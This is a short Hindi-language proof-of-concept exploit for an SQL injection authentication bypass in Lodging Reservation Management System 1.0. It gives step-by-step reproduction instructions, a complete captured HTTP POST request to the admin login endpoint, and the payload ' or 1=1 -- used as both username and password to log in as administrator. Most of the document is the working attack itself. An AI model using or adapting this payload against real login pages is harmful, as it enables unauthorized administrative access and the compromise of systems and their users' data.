
SQL इंजेक्शन और प्रमाणीकरण बाईपास के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Lodging Reservation Management System 1.0 में, क्राफ्टेड पेलोड के माध्यम से अनधिकृत एडमिन एक्सेस सक्षम करना।
#पुनरुत्पादन के चरण: चरण 1 उत्पाद व्यवस्थापक पैनल http://localhost/lodge/admin/login.php पर जाएं। चरण 2 – उपयोगकर्ता नाम और पासवर्ड में कुछ भी दर्ज करें चरण 3 – लॉगिन पर क्लिक करें और बर्प सूट में अनुरोध कैप्चर करें चरण 4 – उपयोगकर्ता नाम को ' OR 1 -- - और पासवर्ड को ' OR 1 -- - में बदलें। चरण 5 – फॉरवर्ड पर क्लिक करें और अब आप व्यवस्थापक के रूप में लॉग इन हो जाएंगे।
POST /lodge/classes/Login.php?f=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 49 Origin: http://localhost Connection: close Referer: http://localhost/lodge/admin/login.php Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin
username=+'+or+1%3D1+--+&password=+'+or+1%3D1+--+
उपयोगकर्ता नाम: ' or 1 -- - पासवर्ड: ' or 1 -- -